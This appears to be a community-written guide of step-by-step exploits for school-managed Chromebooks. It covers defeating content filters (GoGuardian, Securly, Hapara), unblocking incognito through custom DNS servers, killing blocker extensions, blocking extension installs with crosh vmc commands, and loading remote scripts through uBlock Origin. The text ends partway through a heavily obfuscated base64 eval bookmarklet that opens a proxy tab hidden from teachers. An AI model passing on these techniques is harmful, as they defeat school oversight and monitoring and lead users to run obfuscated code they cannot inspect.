  1. Workaround for chrome://settings/signOut and javascript:opener.chrome.send("TurnOffSync"); if both patched: Just go to chrome://settings/syncSetup/advanced and click Customize sync and then flip off the Extensions and Apps or just flip off everything exept for bookmarks

Note: Before you do any of this do it at home so that way you don have to worry about asking for the school wifi password.

New Temporarily Unblock Anything Temporarily Unblock Any Website

Might Be Patched on 115 And Above

  1. Go to the chrome-extension://Paste the blocker id here/manifest.json page.

  2. Go to a new tab page and type in the URL Website you want to unblock don´t go into that website yet just leave it inside the URL Box.

  3. Go back to chrome-extension://Paste the blocker id here/manifest.json now create a bookmark called E now click more and In the URL Box you put chrome://kill now save that bookmark.

  4. Create another bookmark called D click more In the URL Box copy and paste javascript:(function () {window.onbeforeunload = function() { return 1; };})() Into that URL Box and save that bookmark.

  5. Go back to chrome-extension://Paste the blocker id here/manifest.json page and now click bookmark B then quickly go back to the new tab page and click enter now quickly spam bookmark D like 2 or more times now there should be a pop up called do you want to close this page click cancel now boom that website is unblocked until you turn off your chromebook or until you exit out of that website then if that happen´s your gonna have to do all the steps again.

Easier way for step 2: instead of putting the URL in the new tab box go to chrome-extension://Paste the blocker id here/manifest.json page then click Bookmark E then go to a random website then use the javascript:open('https://YOUR WEBSITE HERE?'+'i'.repeat(1)) Bookmarklet then spam Bookmark D two or more times then a pop up should appear quickly click cancel now boom all done. Name of Bookmarklet > Unblock Website: javascript:open('https://YOUR WEBSITE HERE?'+'i'.repeat(1))

Note: Save chrome-extension://Paste the blocker id here/manifest.json as a bookmark so you don´t have to come back here and type in the URL thing.

IMPORTANT NOTE: if bookmarklets are blocked your screwed

This workaround was found by Brandon421-ops

Old Temporarily Unblock Anything Temporarily Unblock Any Website
  1. Make a bookmark called tab close blocker now click more on the bottom left corner now in that URL BOX put javascript:(function () {window.onbeforeunload = function() { return 1; };})()

  2. Go to a newtab page now go into the URL BOX on the top and put https://YOUR WEBSITE HERE do not click enter yet stay in that URL BOX.

  3. Do search+esc now that should open task manager if search+esc doesn't work then click the three dots on the top right now scroll down until you find more tools click that and now find task manager click it now boom done with step 3.

  4. Find your blocker extension and click it now on the bottom right you should see a button called End process click it now quickly click the URL BOX on the newtab page and click enter now quickly spam the bookmark tab close blocker now a pop up should come up it should have to buttons cancel and leave click cancel and boom done.

IMPORTANT NOTE: if bookmarklets are blocked your screwed also if task manager or the End process button for task manager is blocked your double screwed.

uBlock Origin Run Code On Pages

if your school allows the ublock origin chrome extension, then running the edpuzzle script (as well as any other bookmarklet) is possible

  1. install ublock origin (https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm)

  2. go to the extension's settings

  3. under the settings tab, check the "i am an advanced user" box and click on the cog icon

  4. inside the advanced settings (chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/advanced-settings.html), scroll down and find userResourcesLocation now change userResourcesLocation from unset to https://raw.githubusercontent.com/Brandon421-ops/Exploits-And-Hacks/main/ublockExec.js

  5. in the My filters tab of the settings (chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/dashboard.html#1p-filters.html), add *##+js(execute_script.js) as a filter

  6. now you can press ctrl+alt+~ to run any js on the current page

  7. if you want to run a bookmarklet, just paste in the javascript: url and press ok on the popup

uRun Run Code On Pages

From Inglan2.

Recently Google cracked down on bookmarklets and now they don't work (Its based on the DeveloperToolsAvailability policy). He wanted to run scripts still so He started making this, inspired by [uBlock Origin Run Code On Pages] but with more features, like saving scripts.

  1. Open uBlock settings
  2. Enable advanced settings, and click the gear ⚙️ button

[!CAUTION] DO NOT MODIFY ANYTHING ELSE ON THIS PAGE, UNLESS YOU KNOW WHAT YOU ARE DOING (you probably don't), AS YOU COULD BREAK SOMETHING.

[!TIP] If you mess up, go to the home of settings and at the bottom click reset to default settings

  1. Add the script

Change

userResourcesLocation unset

to

userResourcesLocation https://inglan2.github.io/uRun/urun.js

[!TIP] It's down the bottom

  1. Set a filter to load uRun

After closing the advanced settings tab, go to the filters tab and add this:

*##+js(urun.js)

Usage

Simply press Ctrl + Shift + ` to open the menu and from there you can run and create scripts. To add a script, press the ➕ button up the top right, and enter the code you would like to add (without the javascript: part).

Snap&Run Run Code On Pages

Executing scripts with the "Snap&Read" extension.

Extension Snap&Read must be installed to perform this exploit.

Setup

The extension needs to be signed in to an active Snap&Read account before you begin.

Instructions.

Enable the Snap&Read toolbar

  • Open the Snap&Read popup by activating the extension.
  • In the extension popup, enable the Snap&Read service by toggling the Snap&Read switch on.
  1. Open the Snap&Read popup by activating the extension.

  2. In the extension popup, enable the Snap&Read service by toggling the Snap&Read switch on.

  3. In the Snap&Read toolbar, click the Show outlines button.

  4. In the Snap&Read outlines panel, click the New outline (+) button at the top left.

  5. Enter any text into the outline topic's editable text area.

  6. Click the bullet point of the topic.

  7. Click the Link to source option.

  8. Click the plus (+) button at the bottom right.

  9. Click and switch to the WEBSITE tab.

  10. In the Article/Page title input field, enter the name of your chosen bookmarklet.

  11. In the URL input field, enter the source of the bookmarklet, starting with javascript:.

Important: You may need to substitute escape characters for advanced bookmarklets.

  1. Click SAVE at the top right.

  2. Click and switch to the OUTLINE tab.

  3. In the Snap&Read toolbar, click the Hide outlines button.

Script Execution

Instructions

Follow on a page of your choice.

  1. In the Snap&Read toolbar, click the Show outlines button.

  2. In your created outline, click the link separated by parenthasis that contains the bookmarklet.

  3. In the Snap&Read toolbar, click the Hide outlines button.

  4. Disable the Snap&Read toolbar

  5. Open the Snap&Read popup by activating the extension.

  6. In the extension popup, disable the Snap&Read service by toggling the Snap&Read switch off.

Disable the Snap&Read toolbar

  • Open the Snap&Read popup by activating the extension.
  • In the extension popup, disable the Snap&Read service by toggling the Snap&Read switch off.
Incognito Bypass Extensions IP Servers: Server 1. 52.207.185.90 Server 2. 158.111.114.159

Step 1. Go to your settings

Step 2. Click on the wifi your using rn then click it again.

Step 3. Scroll down until you see network once you see the option click it.

Step 4. Scroll down until you find custom name servers now once you find the option click it.

Step 5. Paste in the IP Server.

Step 6. Now there should be a notification saying open new tab click that and now you should be in a small window some instructions and there are 2 buttons click the yellow with black letters button and boom Incognito Mode is Unblocked. One of the buttons are just a link in blue don´t click that one is just for test´s Step 7. Go back to the network settings and change back the custom name servers to automatic name servers. Note: If your connection is slow if your school has more than one wifi then connect to the other wifi that might have a better connection.

Btw if you close out of the Incognito Tab your gonna have to do all the steps again.

Cool Advanced Facts About Incognito Mode:

  1. Bypass Extensions Aka Unblock All Websites.
  2. Your History Is Hidden From Your School
Incognito On The Sign-In Screen Bypass Extensions/Unblocked Google Webview Might work but idk if it will

IP Servers: Server 1. 52.207.185.90 Server 2. 158.111.114.159

Step 1. On the sign-in screen go to your wifi settings and click on the wifi your using rn

Step 2. Then Scroll down until you see network once you see the option click it.

Step 3. Scroll down until you find custom name servers now once you find the option click it.

Step 4. Paste in the IP Server.

Step 5. Now on the network settings click the sign in and now you should be in a small window some instructions and there are 2 buttons click the blue link and boom unblocked webview of google.

Cool Advanced Facts About Incognito Mode:

  1. Bypass Extensions Aka Unblock All Websites.
  2. Your History Is Hidden From Your School
Chrome-Signin Webview Bypass Extensions Unblocked Google

Step 1. Go to chrome://chrome-signin

Step 2. Click ok on the bottom right corner

Step 3. In the Email text box put google@d11.org

Step 4. Click signin options

Step 5. Now click signin with github

Step 6. Click the github logo

Step 7. In the search box on the top Right type google and then click see more topics then you will see all the google links click www.google.com now boom unblocked Google.

Chrome-Signin Webview 2 Bypass Extensions Unblocked Google

Step 1. Go to chrome://chrome-signin

Step 2. Click ok on the bottom right corner

Step 3. In the Email text box put google@d11.org

Step 4. Click signin options

Step 5. Now click signin with github

Step 6 Click forgot password instead of github logo

Step 7. Click docs

Step 8. Scroll down

Step 9. Click ask the GitHub community

Step 10. Search google and click the hyperlink on the right

Credit to snail for finding this workaround.

Microsoft Labs Bypass Extensions

YOU NEED A MICROSOFT ACCOUNT FOR THIS

Go to: https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1

Next, sign into your Microsoft account, then if it doesn't already, go back to that link

Then, hit Launch VM Mode See images attached if needed

After it loads it's gonna ask for a password, the password is pass@word1 See images attached if needed

Then boom, you are done.

It's still kinda limited, like you can't go on Spotify sound doesn't output anyway and it, blocks random sites, but discord 100% works

Thanks to a user in TN, I was informed the best vpn to get around the FortiNet thing "Greenhub" on the Edge add-ons

Quick View Bypass Extensions

QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.

Go to this link and follow instructions

WARNING: If javascript:// is blocked then you can't preform this exploit

Credit to ading2210 and Bypassi#7037 for finding this exploit

Buypass Temporarily Unblock Websites

Exploit Made By Bypassi#7037

Here's the original github repo of the buypass exploit: Bypassi#7037's Buypass Exploit Github Repo

Here's the original website of the buypass exploit: Bypassi#7037's Buypass Exploit Website

Here's the forked github repo of the buypass exploit: Brandon421-ops's Forked Buypass Exploit Github Repo

Here's 3 alternative websites of the buypass exploit:

  1. Buypass Exploit Repl Website

  2. Buypass Exploit Glitch Website

  3. Buypass Exploit netlify.app Website

This Exploit Is Kinda Similar To The Quick View Exploit

[Webview] Testnav Exploit Unblocked Webview for either google or a web browser

Step 1. Download Testnav off the webstore/playstore/or run as a kiosk app as some schools have it added as one

Step 2. Open it

Step 3. After opened it will probably bring you to the page were you select your consumer, click aimsweb/aimsweb plus

Step 4. After you click goto select your district in the bottom right corner of the page

Step 5. Select “STRATFORD FRIENDS SCHOOL”

Step 6. Click the arrow to the right of the selection box

Step 7. Click sign in options a) Click sign in with github

Step 8. Click the github logo at the top of the screen

Step 9. Click the three bars in the top right corner, then goto the search box and type in googleyay

Step 11. Scroll down until you see DerDer56/googleyay

Step 12. There's several links to choose from, but if there's a link you want that's not there click the Bypassi Redirect Tool

(Optional) Step 13. Type in the link you want to go on and click "Go To the URL"

Step 14. Click it and you have webview (unblocked browser)

Lego WeView Exploit Unblocked Google Webview

Lego WeView exploit is a WebView that SIMONHSCH discovered in the titanium network.

Tutorial:

  1. First you need to install lego wedo 2 from the PlaySore or the Chrome Webstore (recommended).

  2. Click the + button at the left bottom

  3. Then click to the pen button at the top

  4. And click the green button similar to Google Doc

Then paste this code: <img src=# onerror='window.location.href="https://google.com"'>

OP Crosh Disable extensions with crosh and vmc

Requirements

  • A managed Chromebook with crosh enabled
  • The VmManagementCliAllowed policy either unset or set to true
  • Some form of removable media for noting down extension IDs (only useful for the second method and not required, but this prevents you from mistyping an extension ID).
  • A willingness to powerwash

There are two variations to this method:

  1. Disabling all extensions. This is probably the most reliable, but you'd be left without useful extensions such as any adblockers. You also aren't able to install anything from the Chrome Web Store either.

  2. Disabling specific extensions. This is less reliable, since this only becomes possible once Chrome OS has installed at least one extension already, which could be one that you're trying to disable.

Testing if the method is possible:

  1. Open crosh by hitting ctrl+alt+t . If a command line pops up then you have crosh enabled and you can move on to step 2.

  2. Test the VmManagementCliAllowed policy by running the vmc command. If a list of subcommands is shown, then you're good to go.

Instructions:

  1. Back up any data you want before the powerwash.

  2. If you're doing the second variation, note down any extension IDs. You may also want to do this if you intend on disabling all extensions, since sometimes that will fail and require you to specify each extension you want to disable.

  3. Powerwash by attempting to enable developer mode. Instructions are available here.

  4. Log into your Google account as normal, but immediately disable your internet right after you sign in.

  5. You should be logged into your account, but without any extensions installed due to being offline.

  6. Here the instructions are split, so follow the one for the method that you want to do.

Disable All Extensions:

  1. Open up crosh by hitting ctrl+alt+t

  2. Type in vmc create-extra-disk --size 1 /home/chronos/user/Extensions

  3. Run that command.

  4. If it fails with a "file exists" error, then you must individually specify each extension that you want to remove. Move to step 5 of the next section to do that.

  5. Re-enable your internet, and no extensions should be installed.

Disable Specific Extensions:

  1. Navigate to chrome://extensions.

  2. Enable your internet, and immediately disable it when an extension is installed.

  3. Assuming the installed extension was not one that you were trying to disable, move on to step 4. If it was, you'd have to powerwash to try again.

  4. Open up crosh by hitting ctrl+alt+t.

  5. For each extension you want to disable, run this command: vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extension_id}

  6. Each command should look something like this: vmc create-extra-disk --size 1 /home/chronos/user/Extensions/cjpalhdlnbpafiamejdnhcphjbkeiagm

  7. Re-enable your internet, and if you typed/pasted in the extension IDs correctly, those specific extensions should be blocked from ever being installed.

Credit to ading2210 for finding this exploit

GoGuardian Fever Disable GoGuardian

IF YOU DO NOT HAVE GOGUARDIAN THIS EXPLOIT WILL NOT WORK FOR YOU

Getting Started

  1. Obviously (but still needs to be said due to skids in Titanium Network), make sure GoGuardian is actually installed

  2. Visit any of the links and copy the text in it and paste it in a newtab Link 1 Link 2 Link 3

  3. On that tab there will be a simple white screen with nothing on it, reload the page

  4. If the GET request fails and you are left on an error screen (don't panic, this is intended, continue)

  5. Visit chrome://restart to clear cached sites from GoGuardian

Enjoy a free browsing context

To undo

  1. On goguardian.com, press the lock icon at the top left of the screen

  2. Press cookies and site data

  3. Click manage cookies

  4. Then click clear each site's cookies you see there

Disable GoGuardian With The Chat Disable GoGuardian [Unreliable]
  1. wait until your teacher opens the chat window thingy

  2. spam the x button until it stops re-opening

  3. open the url chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/manifest.json

  4. open chrome://extensions/?id=haldlgldplgnggkjaafhelgiaglafanh, and toggle the “allow access to file:// urls” switch

goguardian is now disabled and you can close both tabs

made by carteeeee

Disable GoGuardian With The Browsing Disabled Screen Disable GoGuardian

bookmark this tab: chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/lock.html

1: Have chrome://extensions open

2: Ctrl + click on the bookmark to open it (do this about 70+ times)

3: go quickly to chrome://extensions and click on GoGuardian.

4: Click on allow access to file urls very quickly!!!

This is discovered by dkr44433.

GoGuardian TabCrash Disables GoGuardian Actions w/TAB LIMIT

Teacher's can still see your screen, but they can't block or close any of your tabs.

YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS.

  1. create a bookmark named anything: javascript: window.onbeforeunload = ()=>{return false;}

  2. Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of about:blank pages.

  3. It might ask if you want to leave this page, this is goguardian trying to close it. Say No, and click Prevent from creating additional dialogues.

  4. Enjoy your unblocked stay!

To undo: close all of your about:blank tabs

Discovered by @py660

GoGuardian TabCrash 2 Disables GoGuardian Actions w/TAB LIMIT

If your teacher has turned on the tab limit you can bypass this with an extension. If the extension is blocked, sorry.

Step 1. Download the extension Read Aloud: A Text to Speech Voice Reader

Step 2. Use one of your tabs to go to IReady or Scratch. You just need a site that would display the error when you close the tab "Are you sure you want to close this site? Unsaved changes could be lost."

Step 3. When you have the site with unsaved changes, click the extension until you see the error. Click cancel on the error.

Step 4. The extension should have opened some tabs which say: "Read Aloud uses this tab for audio playback."

Step 5. If you saw the error and clicked cancel, you should have bypassed the tab limit.

Insecurly Toggle the Securly extension

ONLY FOR SECURLY USERS

Go to this link and follow instructions

If blocked then go cry in a corner

Credit to Bypassi#7037 for finding/Making this exploit

A Bypass For Securly and a few of other blocker extensions Manipulate any website so securly or any other blocker extension can't block it

At any URL put #translate.google.com at the end of it or put ?suicidepreventionlifeline.org at the end of it and bam you just unblocked a website by Manipulating the URL

This only works for securly and some other blocker extensions

Glitch through securly Unblock any website blocked from securly

This only works if your admin/school uses securly. Not sure if this can be blocked or not. So im going to do this step by step

  1. Go to the blocked site you want to access

  2. Once it shows the blocked page copy the url it shows

  3. Go to the url bar and delete everything between https:// and the first "?"

  4. Paste the website url

  5. press enter and voila it should be unblocked

  6. Have fun

confirmed working with xbox cloud gaming and now.gg

If it doesn't work then go cry.

SOT Exploit Unblock any website or Open any website in a about:blank page
  1. Download this extension One Tab

  2. Click the import button in the settings tab.

  3. Copy-paste the URL you wish to visit about 100 times, and then click import.

  4. Spam click the top link, then either spam escape on one of them or wait for one to load on a about:blank page.

Credit to Coding4Hours

Chaos A full bypass method for Hapara Highlights and Hapara Filter

Devtools must not be blocked by policy to perform this exploit.

Go to this link and follow instructions

If blocked then go cry in a corner

Filter session bypass Bypass hapara filter session

Bookmark this link: filtersessionbypass.txt

During a filter session, right click the link, and press "Open in a new tab" Then insert the URL for any website you want to go to. Make sure to include https://
If it says "website name refused to connect", try using a web proxy.
Also this dosn't bypass blocker extentions so use an unblocked link, or another exploit.

Hapara Lock Screen Bypass Bypass Hapara Lock Screen
  1. Make bookmarks of pages you want to visit beforehand.

  2. Once your screen is paused, spam unfullscreen. Each time you do, you should see your tabs and bookmark bar come back. Attempt to right-click on the bookmarks bar until a menu shows up.

  3. In the menu, select “Add folder”. Name it whatever you like. Hit Done. With luck, your tabs and bookmarks should stay at the top of your screen. If not, try again.

  4. Once the tab and bookmarks bar stays, spam-click one of the bookmarks you made. This lags Hapara into displaying your page instead of the pause page. Turn off your wifi as soon as the page fully loads. This stops data flow between your amd the teacher’s computer, so that they can’t re-pause your screen.

Alphabetic Opens unfiltered tabs that are invisible on the teacher dashboard

Instructions

  1. Right after clicking the bookmark, print the page with Ctrl + P.

  2. Click try again on the 404 page.

  3. Run the script again.

A proxy tab should open that is not visible on the teacher dashboard.

Heres the bookmark: data:text/html;javascript:eval(atob('dmFyIEg9eCxUPXg7KGZ1bmN0aW9uKFosdil7dmFyIE89eCxZPXgsZT1aKCk7d2hpbGUoISFbXSl7dHJ5e3ZhciBCPXBhcnNlSW50KE8oMHgxMTQpKS8oLTB4NjdmKjB4MSsweDE5YzcrLTB4MTM0NykqKHBhcnNlSW50KE8oMHhlNykpLygweGIxMistMHg2NSotMHgzNSstMHgxZmY5KSkrcGFyc2VJbnQoWSgweGY4KSkvKC0weDI0OTYrLTB4MWQzNysweDQxZDApKy1wYXJzZUludChZKDB4MTBiKSkvKC0weDExMmIrMHhiZjIrMHg1M2QpKy1wYXJzZUludChPKDB4MTA2KSkvKDB4MWExOCsweGZkMSotMHgxKy0weGE0MikqKC1wYXJzZUludChPKDB4ZjIpKS8oMHgyKi0weGRkNSsweDE1YSotMHgxNisweDM5NmMpKStwYXJzZUludChPKDB4ZTgpKS8oMHgxMTdiKy0weDE0NmUrMHgyZmEpKihwYXJzZUludChZKDB4ZGUpKS8oLTB4YmMwKzB4MiotMHhlOGErMHgyOGRjKSkrLXBhcnNlSW50KFkoMHhlYikpLygweDQ2YyotMHg2KzB4MjA1MSstMHg1YzApKihwYXJzZUludChZKDB4ZTEpKS8oLTB4MTgxYysweDRlOCoweDYrLTB4NTRhKSkrLXBhcnNlSW50KFkoMHhmYykpLygtMHgzZTYqLTB4MSsweDFkMzMrLTB4MjEwZSk7aWYoQj09PXYpYnJlYWs7ZWxzZSBlWydwdXNoJ10oZVsnc2hpZnQnXSgpKTt9Y2F0Y2goRil7ZVsncHVzaCddKGVbJ3NoaWZ0J10oKSk7fX19KEMsMHg4YTYzYysweDg2NjArMHgxMTU5NikpO2Z1bmN0aW9uIHgocCxnKXt2YXIgWj1DKCk7cmV0dXJuIHg9ZnVuY3Rpb24odixlKXt2PXYtKDB4NDJiKi0weDkrMHgyMzExKjB4MSsweDM0ZSk7dmFyIEI9Wlt2XTtyZXR1cm4gQjt9LHgocCxnKTt9dmFyIGc9KGZ1bmN0aW9uKCl7dmFyIFo9ISFbXTtyZXR1cm4gZnVuY3Rpb24odixlKXt2YXIgQj1aP2Z1bmN0aW9uKCl7dmFyIGQ9eDtpZihlKXt2YXIgRj1lW2QoMHhkZCkrJ3knXSh2LGFyZ3VtZW50cyk7cmV0dXJuIGU9bnVsbCxGO319OmZ1bmN0aW9uKCl7fTtyZXR1cm4gWj0hW10sQjt9O30oKSk7KGZ1bmN0aW9uKCl7dmFyIHo9eCxBPXgsdj17fTt2W3ooMHgxMDIpKydZJ109ZnVuY3Rpb24oQixGKXtyZXR1cm4gQitGO30sdltBKDB4ZmYpKyd1J109eigweGVmKSsnbic7dmFyIGU9djtnKHRoaXMsZnVuY3Rpb24oKXt2YXIgRD16LGI9QSxCPW5ldyBSZWdFeHAoRCgweGVlKStEKDB4MTFjKStiKDB4MTE1KStEKDB4MTE4KSksRj1uZXcgUmVnRXhwKEQoMHhlYSkrRCgweGZlKStEKDB4MTE3KStiKDB4MTEyKStiKDB4ZWMpK2IoMHgxMDkpK0QoMHhkYykrYigweGUwKSsnKiknLCdpJyksVT1wKGIoMHhmMSkpOyFCW0QoMHgxMGUpXShlW0QoMHgxMDIpKydZJ10oVSxlW0QoMHhmZikrJ3UnXSkpfHwhRltiKDB4MTBlKV0oVSsoYigweDEwYykrJ3QnKSk/VSgnMCcpOnAoKTt9KSgpO30oKSksd2luZG93W0goMHgxMjEpXShUKDB4MTIzKStIKDB4MTAxKStIKDB4MTA0KStIKDB4MTAzKStUKDB4MTA4KStIKDB4ZTMpK1QoMHgxMTkpK1QoMHgxMDApK1QoMHhlNCkrVCgweDEwZikrSCgweGUyKSkoKTtmdW5jdGlvbiBwKFope3ZhciBKPVQsdz1ILHY9eyd5dnZkZCc6ZnVuY3Rpb24oQixGKXtyZXR1cm4gQj09PUY7fSwnc2pES20nOkooMHhlNSksJ2ZTQ1lIJzp3KDB4MTFlKSt3KDB4MTA3KSt3KDB4MTI2KSwnTWZVUnMnOmZ1bmN0aW9uKEIsRil7cmV0dXJuIEIoRik7fX07ZnVuY3Rpb24gZShCKXt2YXIgYT13LFY9dztpZih2W2EoMHgxMWIpKydkJ10odHlwZW9mIEIsYSgweGZkKSsnbmcnKSlyZXR1cm4gZnVuY3Rpb24oRil7fVthKDB4MTI0KSthKDB4MTIyKStWKDB4ZjMpXShWKDB4MTIwKSthKDB4MTExKStWKDB4MTA1KSthKDB4MTI5KSlbVigweGRkKSsneSddKGEoMHgxMjUpK1YoMHgxMWYpKTtlbHNlKCcnK0IvQilbVigweGY3KSsndGgnXSE9PTB4OGQzKi0weDErMHg2NGQqLTB4MysweDFiYmJ8fEIlKDB4NTIwKy0weDIwNzMrLTB4NTdiKi0weDUpPT09LTB4Y2Q3Ky0weGEwYSoweDErLTB4MSotMHgxNmUxP2Z1bmN0aW9uKCl7cmV0dXJuISFbXTt9W2EoMHgxMjQpK1YoMHgxMjIpK1YoMHhmMyldKGEoMHhlNSkrVigweGY0KSlbYSgweDExMCldKGEoMHhlNikrJ29uJyk6ZnVuY3Rpb24oKXtyZXR1cm4hW107fVthKDB4MTI0KStWKDB4MTIyKStWKDB4ZjMpXSh2W1YoMHhmYSkrJ20nXSthKDB4ZjQpKVthKDB4ZGQpKyd5J10odltWKDB4MTEzKSsnSCddKTtlKCsrQik7fXRyeXtpZihaKXJldHVybiBlO2Vsc2Ugdlt3KDB4ZjYpKydzJ10oZSwweGJmKzB4MSotMHgyNTkrMHgxOWEpO31jYXRjaChCKXt9fWZ1bmN0aW9uIEMoKXt2YXIgaT1bJ3RydWMnLCdodHRwJywnY29ucycsJ2NvdW4nLCdlY3QnLCdydWN0JywndmFsJywnXHgyMHt9JywnLXpBLScsJ2FwcGwnLCcxOTEySUNiUEtQJywnKShceDIwKScsJ1pfJF0nLCczODAxMDEwWmlmTU13JywnWGNRJywnY29tLycsJ2RRdzQnLCdkZWJ1JywnYWN0aScsJzJvQWNKYVQnLCcyNTYxM3ljbmt3RycsJ3t9LmMnLCdceDVjK1x4NWMrJywnOUdPRktBQycsJ18kXVsnLCdzZXRJJywnZnVuYycsJ2NoYWknLCdyblx4MjAoJywnaW5pdCcsJzM2NjA2VUl5cVBZJywndG9yJywnZ2dlcicsJ2hpc1x4MjInLCdNZlVSJywnbGVuZycsJzQ0OTA0Nk5odGVZaicsJygpXHgyMCcsJ3NqREsnLCdudGVyJywnMTQyMzM3NjlOQ1didlonLCdzdHJpJywnXHgyMCooPycsJ2NCc2wnLCdoP3Y9JywnczovLycsJ3JWUWonLCd5b3V0Jywnd3d3LicsJ3J1ZSknLCc2ODBTQnpjVlAnLCdlT2JqJywndWJlLicsJzAtOWEnLCdvbnN0JywnMjAzNzYwd0lFQUNvJywnaW5wdScsJ3JldHUnLCd0ZXN0JywndzlXZycsJ2NhbGwnLCdlXHgyMCh0JywnekEtWicsJ2ZTQ1knLCc1NDM0MDdUUXhDcXgnLCdceDIwKlx4NWMoJywnd0hyeCcsJzpbYS0nLCdceDIwKlx4NWMpJywnd2F0YycsJ3JuXHgyMHQnLCd5dnZkJywndGlvbicsJ29yKFx4MjInLCdzdGF0JywndGVyJywnd2hpbCcsJ29wZW4nXTtDPWZ1bmN0aW9uKCl7cmV0dXJuIGk7fTtyZXR1cm4gQygpO30oZnVuY3Rpb24oKXt2YXIgeT1ULHM9VCx2PXt9O3ZbeSgweDExNikrJ24nXT1zKDB4MTBkKSt5KDB4ZjApK3MoMHhlZSkrcygweDExYykrcygweGY5KTt2YXIgZT12LEI9ZnVuY3Rpb24oKXt2YXIgbT15LEc9cyxVO3RyeXtVPUZ1bmN0aW9uKGVbbSgweDExNikrJ24nXSsoRygweGU5KSttKDB4MTBhKStHKDB4MTI3KStHKDB4MTFkKStHKDB4MTBkKSttKDB4MTFhKSttKDB4ZjUpK20oMHhkZikpKycpOycpKCk7fWNhdGNoKFgpe1U9d2luZG93O31yZXR1cm4gVTt9LEY9QigpO0ZbeSgweGVkKSt5KDB4ZmIpK3koMHgxMjgpXShwLC0weDZmMSoweDErLTB4MWMxKjB4ZCsweDFlODYpO30oKSk7')),%3Ctitle%3EScreenshot%20Reader%3C%2Ftitle%3E%3Ch1%3EAddon%20Installer%20for%20Screenshot%20Reader%3C%2Fh1%3E%3Cp%3EPlease%20allow%20%3Cb%3EJavaScript%20URLs%3C%2Fb%3E%20to%20continue%3C%2Fp%3E%3Cbr%3E%3Csmall%3EPress%20Control%2BP%20to%20print%20this%20page%3C%2Fsmall%3E%3Cscript%3E%28function%28K%2Co%29%7Bconst%20F%3DK%28%29%3Bfunction%20T%28K%2Co%2CF%2Cv%2CH%2CY%2CR%29%7Breturn%20w%28F-%20-0x31c%2CR%29%3B%7Dwhile%28%21%21%5B%5D%29%7Btry%7Bconst%20v%3D-parseInt%28T%28-0x189%2C-0x199%2C-0x17d%2C-0x168%2C-0x181%2C-0x195%2C%27aUk6%27%29%29/%28-0x345*0xa+0x43*-0x7+0x2288%29*%28-parseInt%28T%28-0x138%2C-0x12d%2C-0x142%2C-0x141%2C-0x14b%2C-0x13d%2C%27T09K%27%29%29/%28-0xae*-0x20+-0x4f8+-0x10c6%29%29+parseInt%28T%28-0x149%2C-0x13f%2C-0x13f%2C-0x143%2C-0x167%2C-0x165%2C%27Cr%5BR%27%29%29/%280x9cd*-0x3+0xb5*0x22+-0x8*-0xac%29*%28-parseInt%28T%28-0x13e%2C-0x13a%2C-0x158%2C-0x149%2C-0x170%2C-0x14e%2C%27iKyB%27%29%29/%28-0x1*-0x1afb+0x1bac+-0x36a3%29%29+-parseInt%28T%28-0x17d%2C-0x169%2C-0x166%2C-0x185%2C-0x147%2C-0x178%2C%27oEsR%27%29%29/%280x7e9+-0x1*-0x24ed+-0x2cd1*0x1%29+-parseInt%28T%28-0x161%2C-0x172%2C-0x14d%2C-0x15c%2C-0x14e%2C-0x132%2C%27JQEt%27%29%29/%280x19fd+0x107d+-0xd1*0x34%29+parseInt%28T%28-0x144%2C-0x180%2C-0x163%2C-0x15d%2C-0x186%2C-0x14f%2C%27DVnL%27%29%29/%280x9b5+0x267+0xc15*-0x1%29+parseInt%28T%28-0x137%2C-0x15e%2C-0x152%2C-0x13e%2C-0x147%2C-0x176%2C%27ltzn%27%29%29/%280x8c1+0x5ce+-0xe87*0x1%29+parseInt%28T%28-0x17e%2C-0x144%2C-0x15c%2C-0x16f%2C-0x17f%2C-0x152%2C%27Y%5B%25s%27%29%29/%280x1d0a+0x9ad*-0x4+0x9b3%29*%28parseInt%28T%28-0x12e%2C-0x122%2C-0x13d%2C-0x11d%2C-0x128%2C-0x132%2C%27iKyB%27%29%29/%280xeda*0x2+0x5d0+-0x237a%29%29%3Bif%28v%3D%3D%3Do%29break%3Belse%20F%5B%27push%27%5D%28F%5B%27shift%27%5D%28%29%29%3B%7Dcatch%28H%29%7BF%5B%27push%27%5D%28F%5B%27shift%27%5D%28%29%29%3B%7D%7D%7D%28Q%2C-0x11a87*0xd+0x9d9c5+-0x10aa6*-0xf%29%29%3Bfunction%20w%28C%2Ca%29%7Bconst%20K%3DQ%28%29%3Breturn%20w%3Dfunction%28G%2Cg%29%7BG%3DG-%28-0x2357+0x1591*-0x1+0x3a78%29%3Blet%20o%3DK%5BG%5D%3Bif%28w%5B%27nOjZNt%27%5D%3D%3D%3Dundefined%29%7Bvar%20F%3Dfunction%28A%29%7Bconst%20T%3D%27abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%3D%27%3Blet%20l%3D%27%27%2CN%3D%27%27%2Cj%3Dl+F%3Bfor%28let%20i%3D0xa4d+0x382+0x5*-0x2c3%2CW%2Ch%2Cs%3D0x10fd*-0x1+-0x1f*-0x6a+0x427*0x1%3Bh%3DA%5B%27charAt%27%5D%28s++%29%3B%7Eh%26%26%28W%3Di%25%280x190d+-0x15c8*0x1+0x31*-0x11%29%3FW*%28-0xb*0x143+0x24e8+0x11*-0x157%29+h%3Ah%2Ci++%25%280x1*0xf1d+-0x2500+0x15e7%29%29%3Fl+%3Dj%5B%27charCodeAt%27%5D%28s+%28-0xa8a+0x3*0xc4d+-0x1a53%29%29-%280x22e5+0x2330+0x1a1*-0x2b%29%21%3D%3D0x2de*-0x7+0x1185+-0x1*-0x28d%3FString%5B%27fromCharCode%27%5D%28-0x4*0x95c+0x1e7f+-0x10*-0x7f%26W%3E%3E%28-%280x1007*0x1+0x1fe1+-0x2fe6%29*i%26-0x3d*-0x6b+-0x16c4+-0x2b5%29%29%3A